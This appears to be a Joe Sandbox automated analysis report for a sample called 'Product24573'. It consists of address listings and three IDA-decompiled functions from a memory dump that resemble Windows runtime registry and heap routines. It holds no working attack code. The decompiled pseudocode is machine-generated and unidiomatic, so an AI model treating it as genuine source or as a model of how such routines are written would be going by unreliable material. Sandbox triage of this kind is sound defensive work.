                                          0x0112046d
                                          0x0112046f
                                          0x0112046f
                                          0x01120471
                                          0x01120476
                                          0x0112047a
                                          0x0112047b
                                          0x01120483
                                          0x01120489
                                          0x0112048d
                                          0x00000000
                                          0x00000000
                                          0x01164ce9
                                          0x01164cef
                                          0x01164d22
                                          0x01164d22
                                          0x00000000
                                          0x01164d22
                                          0x01164cf1
                                          0x01164cf7
                                          0x00000000
                                          0x00000000
                                          0x01164cf9
                                          0x01164cff
                                          0x00000000
                                          0x00000000
                                          0x01164d05
                                          0x01164d07
                                          0x00000000
                                          0x00000000
                                          0x01164d0d
                                          0x01164d0f
                                          0x01164d14
                                          0x01164d16
                                          0x00000000
                                          0x00000000
                                          0x01164d1c
                                          0x01164d1c
                                          0x01120499
                                          0x01120535
                                          0x01120535
                                          0x00000000
                                          0x01120535
                                          0x011204a6
                                          0x01164d2c
                                          0x01164d37
                                          0x01164d39
                                          0x01164d3b
                                          0x00000000
                                          0x00000000
                                          0x01164d41
                                          0x01164d48
                                          0x01120527
                                          0x0112052b
                                          0x0112052d
                                          0x01120530
                                          0x01120530
                                          0x00000000
                                          0x0112052b
                                          0x01164d4e
                                          0x011204ac
                                          0x011204ac
                                          0x011204af
                                          0x011204b2
                                          0x011204b7
                                          0x011204b9
                                          0x011204bb
                                          0x011204bd
                                          0x011204bf
                                          0x011204c5
                                          0x011204c9
                                          0x01164d53
                                          0x01164d59
                                          0x01164db9
                                          0x01164dba
                                          0x01164dbf
                                          0x01164dc2
                                          0x01164dc4
                                          0x01164dc7
                                          0x01164dce
                                          0x00000000
                                          0x01164dce
                                          0x01164d5b
                                          0x01164d61
                                          0x00000000
                                          0x00000000
                                          0x01164d63
                                          0x01164d69
                                          0x00000000
                                          0x00000000
                                          0x01164d6b
                                          0x01164d6e
                                          0x01164d74
                                          0x01164d76
                                          0x01164d7c
                                          0x01164d7e
                                          0x01164d84
                                          0x01164d89
                                          0x01164d8c
                                          0x01164d8d
                                          0x01164d92
                                          0x01164d95
                                          0x01164d96
                                          0x01164d98
                                          0x01164d9a
                                          0x01164d9f
                                          0x01164da4
                                          0x01164da6
                                          0x01164da8
                                          0x01164daf
                                          0x01164db1
                                          0x01164db1
                                          0x01164daf
                                          0x01164da6
                                          0x01164d84
                                          0x01164d7c
                                          0x00000000
                                          0x01164d74
                                          0x011204d6
                                          0x01164de1
                                          0x011204dc
                                          0x011204dc
                                          0x011204dc
                                          0x011204e4
                                          0x01164deb
                                          0x01164df1
                                          0x01164df8
                                          0x01164dfe
                                          0x01164e03
                                          0x01164e05
                                          0x01164e17
                                          0x01164e07
                                          0x01164e10
                                          0x01164e10
                                          0x01164e1c
                                          0x01164e1f
                                          0x01164e35
                                          0x01164e35
                                          0x01164e1f
                                          0x01164df8
                                          0x011204f1
                                          0x011204fa
                                          0x01164e3f
                                          0x01164e47
                                          0x01164e5b
                                          0x01164e61
                                          0x01164e67
                                          0x01164e69
                                          0x01164e71
                                          0x01164e73
                                          0x01120500
                                          0x01120500
                                          0x01120500
                                          0x011204fa
                                          0x01120508
                                          0x0112051d
                                          0x0112051d
                                          0x0112051f
                                          0x01120524
                                          0x00000000
                                          0x01120524
                                          0x01120515
                                          0x01120517
                                          0x01164e7a
                                          0x01164e7c
                                          0x00000000
                                          0x00000000
                                          0x01164e85
                                          0x00000000
                                          0x01164e85
                                          0x00000000
                                          0x01120517

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 643cc52b5e56fd9dc320fa762721f71880233b1a6ef3e6bc2bf5953cc94a9a20
                                          • Instruction ID: b0d7560b2964c82672afc530a5394d775bd4188d34d5087a6cbb546883028883
                                          • Opcode Fuzzy Hash: 643cc52b5e56fd9dc320fa762721f71880233b1a6ef3e6bc2bf5953cc94a9a20
                                          • Instruction Fuzzy Hash: C8914C31E002699FEB3D9BACC844BAD7BE8AB15728F050361FA10AB6D1D7749D60C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FC600 Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E010FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x11ed360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01106D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0113B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x11e7b9c; // 0x0
					_t74 = L01114620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01139650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L011177F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0113F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E011313C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L011177F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01139650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                          0x010fc608
                                          0x010fc615
                                          0x010fc625
                                          0x010fc62d
                                          0x010fc635
                                          0x010fc640
                                          0x010fc680
                                          0x010fc687
                                          0x010fc688
                                          0x010fc689
                                          0x010fc694
                                          0x010fc694
                                          0x010fc642
                                          0x010fc64a
                                          0x010fc697
                                          0x01167a25
                                          0x01167a2b
                                          0x01167a2e
                                          0x01167a30
                                          0x01167bea
                                          0x01167bea
                                          0x00000000
                                          0x01167bea
                                          0x01167a36
                                          0x01167a43
                                          0x01167a48
                                          0x01167a4c
                                          0x01167a4e
                                          0x00000000
                                          0x00000000
                                          0x01167a58
                                          0x01167a5a
                                          0x01167a5b
                                          0x01167a5c
                                          0x01167a5d
                                          0x01167a63
                                          0x01167a64
                                          0x01167a6a
                                          0x01167a6c
                                          0x01167a6e
                                          0x011679cb
                                          0x011679cb
                                          0x011679ce
                                          0x011679d0
                                          0x01167a98
                                          0x01167a9b
                                          0x01167a9b
                                          0x01167a9e
                                          0x01167aa1
                                          0x01167bbe
                                          0x01167bbe
                                          0x01167bc0
                                          0x01167be0
                                          0x01167be0
                                          0x01167a01
                                          0x01167a01
                                          0x01167a05
                                          0x01167a07
                                          0x01167a15
                                          0x01167a15
                                          0x01167a1a
                                          0x00000000
                                          0x01167a1a
                                          0x01167bc2
                                          0x01167bc6
                                          0x01167bc9
                                          0x01167bcd
                                          0x01167bcf
                                          0x011679e6
                                          0x011679e6
                                          0x011679eb
                                          0x011679eb
                                          0x011679ef
                                          0x011679f1
                                          0x00000000
                                          0x00000000
                                          0x011679f3
                                          0x011679f5
                                          0x011679ff
                                          0x011679ff
                                          0x00000000
                                          0x011679ff
                                          0x011679f7
                                          0x011679fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011679fd
                                          0x01167bd5
                                          0x01167bd8
                                          0x00000000
                                          0x00000000
                                          0x01167ba9
                                          0x01167bac
                                          0x01167bb0
                                          0x01167bb1
                                          0x01167bb1
                                          0x01167bb6
                                          0x00000000
                                          0x01167bb6
                                          0x01167aa7
                                          0x01167aaa
                                          0x00000000
                                          0x00000000
                                          0x01167ab2
                                          0x01167ab3
                                          0x01167ab5
                                          0x01167aec
                                          0x01167aef
                                          0x01167b25
                                          0x01167b28
                                          0x01167b62
                                          0x01167b64
                                          0x01167b8f
                                          0x01167b92
                                          0x01167b96
                                          0x01167b98
                                          0x00000000
                                          0x00000000
                                          0x01167b9e
                                          0x01167b9f
                                          0x01167ba3
                                          0x00000000
                                          0x01167ba3
                                          0x01167b66
                                          0x01167b68
                                          0x01167ae2
                                          0x01167ae2
                                          0x00000000
                                          0x01167ae2
                                          0x01167b6e
                                          0x01167b72
                                          0x01167b75
                                          0x01167b81
                                          0x01167b85
                                          0x01167b87
                                          0x00000000
                                          0x00000000
                                          0x01167b31
                                          0x01167b34
                                          0x01167b3c
                                          0x01167b45
                                          0x01167b46
                                          0x01167b4f
                                          0x01167b51
                                          0x01167b57
                                          0x01167b59
                                          0x01167b59
                                          0x00000000
                                          0x01167b59
                                          0x01167b77
                                          0x00000000
                                          0x01167b77
                                          0x01167b2a
                                          0x00000000
                                          0x01167b2a
                                          0x01167af1
                                          0x01167af3
                                          0x00000000
                                          0x00000000
                                          0x01167afb
                                          0x01167afc
                                          0x01167afe
                                          0x00000000
                                          0x00000000
                                          0x01167b00
                                          0x01167b03
                                          0x00000000
                                          0x00000000
                                          0x01167b05
                                          0x01167b09
                                          0x01167b0d
                                          0x01167b0f
                                          0x00000000
                                          0x00000000
                                          0x01167b18
                                          0x01167b1d
                                          0x00000000
                                          0x01167b1d
                                          0x01167ab7
                                          0x01167ab9
                                          0x00000000
                                          0x00000000
                                          0x01167abf
                                          0x01167ac1
                                          0x00000000
                                          0x00000000
                                          0x01167ac3
                                          0x01167ac6
                                          0x00000000
                                          0x00000000
                                          0x01167ac8
                                          0x01167acc
                                          0x01167ad0
                                          0x01167ad2
                                          0x00000000
                                          0x00000000
                                          0x01167adb
                                          0x00000000
                                          0x01167adb
                                          0x011679d6
                                          0x011679d9
                                          0x011679dc
                                          0x01167a91
                                          0x01167a94
                                          0x00000000
                                          0x01167a94
                                          0x011679e2
                                          0x00000000
                                          0x011679e2
                                          0x01167a74
                                          0x01167a7a
                                          0x00000000
                                          0x00000000
                                          0x01167a8a
                                          0x01167a21
                                          0x01167a21
                                          0x00000000
                                          0x01167a21
                                          0x010fc650
                                          0x010fc651
                                          0x010fc656
                                          0x010fc65c
                                          0x010fc65d
                                          0x010fc663
                                          0x010fc664
                                          0x010fc66a
                                          0x010fc66e
                                          0x011679c5
                                          0x011679c7
                                          0x00000000
                                          0x011679c7
                                          0x010fc67a
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 812955561579564422018ebca0b88ba41e6da0be24067981ae34ac51e01afac9
                                          • Instruction ID: 6a54287202ea4b6a1ff57befb38cd25a1b8f6337077fe2ddcd6cf8011aabf4c1
                                          • Opcode Fuzzy Hash: 812955561579564422018ebca0b88ba41e6da0be24067981ae34ac51e01afac9
                                          • Instruction Fuzzy Hash: F081A6756042028BDB2ECE58C881A7E77EDEF8435CF19486DEE459B281E332DD50CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112138B Relevance: .2, Instructions: 206COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E0112138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E01120678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E01139660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E01117D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E011B138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E011216C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E011BA80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E0111B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E0111A830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E011BA80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                          0x0112139f
                                          0x011213a1
                                          0x011213a4
                                          0x011213a6
                                          0x011213ab
                                          0x011213b3
                                          0x01165522
                                          0x00000000
                                          0x01165522
                                          0x011213b9
                                          0x011213c1
                                          0x011213c4
                                          0x011213cd
                                          0x011213d0
                                          0x011213d9
                                          0x011213dc
                                          0x011213df
                                          0x011213e4
                                          0x0116552b
                                          0x00000000
                                          0x00000000
                                          0x01165534
                                          0x0116553f
                                          0x01165545
                                          0x01165549
                                          0x0116554a
                                          0x0116554f
                                          0x01165550
                                          0x01165559
                                          0x0116551c
                                          0x00000000
                                          0x0116551c
                                          0x01165562
                                          0x01165574
                                          0x01165564
                                          0x0116556d
                                          0x0116556d
                                          0x0116557c
                                          0x01165597
                                          0x01165597
                                          0x0116559f
                                          0x011655a2
                                          0x011655a5
                                          0x011655a5
                                          0x011213ec
                                          0x011213f2
                                          0x011213f4
                                          0x011213f8
                                          0x011213fe
                                          0x01121400
                                          0x01121406
                                          0x01121412
                                          0x01121419
                                          0x011655b0
                                          0x011655b5
                                          0x011655b8
                                          0x011655b8
                                          0x01121425
                                          0x01121429
                                          0x0112142c
                                          0x0112142f
                                          0x01121432
                                          0x01121435
                                          0x0112143a
                                          0x0112143d
                                          0x01121443
                                          0x01121446
                                          0x01121449
                                          0x01121450
                                          0x01121453
                                          0x01121459
                                          0x0112145f
                                          0x01121462
                                          0x01121467
                                          0x011214fa
                                          0x0112146d
                                          0x0112146d
                                          0x0112146d
                                          0x0112146f
                                          0x01121479
                                          0x01121480
                                          0x01121507
                                          0x01121508
                                          0x01121510
                                          0x011655c1
                                          0x011655c2
                                          0x011655cc
                                          0x011655d1
                                          0x011655d4
                                          0x011655d7
                                          0x011655d7
                                          0x01121482
                                          0x01121482
                                          0x01121482
                                          0x01121484
                                          0x0112149b
                                          0x011214a4
                                          0x011214ae
                                          0x011214b4
                                          0x011214b4
                                          0x011214ba
                                          0x011214c4
                                          0x011214c4
                                          0x011214c9
                                          0x011214cf
                                          0x011214d2
                                          0x011214d7
                                          0x011655df
                                          0x011655e0
                                          0x011655ea
                                          0x011214dd
                                          0x011214dd
                                          0x011214df
                                          0x011214e2
                                          0x011214e4
                                          0x011214e4
                                          0x011214e7
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction ID: 7bf819f9017ad34e6eaef0f95abd1c6d934657888e5d01382227fb175dc7509f
                                          • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction Fuzzy Hash: 7781AF71A00745AFCB29CF68C444BAABBF6FF48354F148569E946C7751D330EA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0118B8D0 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0118B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x11e7b9c; // 0x0
				_t124 = L01114620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01139800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E011395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E011395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L011177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01139910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E011395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x11e7b9c; // 0x0
									_t92 = L01114620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01139910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E010FA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0118E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0118E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E011395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                          0x0118b8d9
                                          0x0118b8e4
                                          0x00000000
                                          0x0118b8e6
                                          0x0118b8f3
                                          0x0118b8f5
                                          0x0118b8f5
                                          0x0118b8f8
                                          0x0118b920
                                          0x0118b924
                                          0x0118b936
                                          0x0118b939
                                          0x0118b93d
                                          0x0118b948
                                          0x0118b9a0
                                          0x0118b9a0
                                          0x0118b9a4
                                          0x0118b9bf
                                          0x0118b9c4
                                          0x0118b9c6
                                          0x0118b9cd
                                          0x0118b9d1
                                          0x0118bad4
                                          0x0118bad8
                                          0x0118bada
                                          0x0118badc
                                          0x0118badc
                                          0x0118badf
                                          0x0118bae0
                                          0x0118bae2
                                          0x0118bae4
                                          0x0118baec
                                          0x0118baee
                                          0x0118baf0
                                          0x0118baf0
                                          0x0118baec
                                          0x0118bafb
                                          0x0118bafc
                                          0x0118bafe
                                          0x0118bb01
                                          0x0118bb01
